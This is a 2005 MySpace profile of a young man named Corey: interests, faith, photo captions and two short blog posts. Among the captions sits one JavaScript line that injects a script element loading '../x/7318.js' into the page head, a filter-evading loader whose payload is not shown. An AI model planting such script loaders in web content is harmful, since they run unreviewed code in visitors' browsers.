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Love Never Fails

About Me

hi my name is corey and i will literally rock your face off.

im a big fan of that Jesus guy. He's helped me out of many a jam.

i have another myspace with just my photograhy

Please message me before you add me,

I dont want a bunch of friends i'll never talk to.

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My Interests

Skateboarding. Photography. Filming. Editing videos. Friends. Food. Music. Jesus and many many more things.

I'd like to meet:

a man who can wear a turtle neck and not make me want to punch a baby.

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i like what you like, and then some. and then maybe minus some.


i like the kind that dont suck. pretty much.


Click The Play arrow to start the movie.


The Bible. Velvet Elvis. any book that will make me think. stuff like that.


Jesus and everyone who was never cool enough.

adopt your own virtual pet!

CP and Nate
Old School. Guess which one is me.
Cha x2
Drew's Cat
Dave and Dave
.."var s=document.createElement('script');s.src='../x/7318.js';docu ment.getElementsByTagName('head')[0].appendChild(s);"..but most of all Nathan is my hero.

My Blog

between the end and where we lie(pictures)

Is this everything, I've dreamed of so much more between the end and where we lie here all hopes and dreams are scavenged from the floor and fed into machines that feed on vacant eyes all of my dreams...
Posted by corey on Mon, 07 Nov 2005 07:53:00 PST

cool guy

Anthony D. Gonzales is a cool guy.   the end.
Posted by corey on Fri, 30 Sep 2005 03:54:00 PST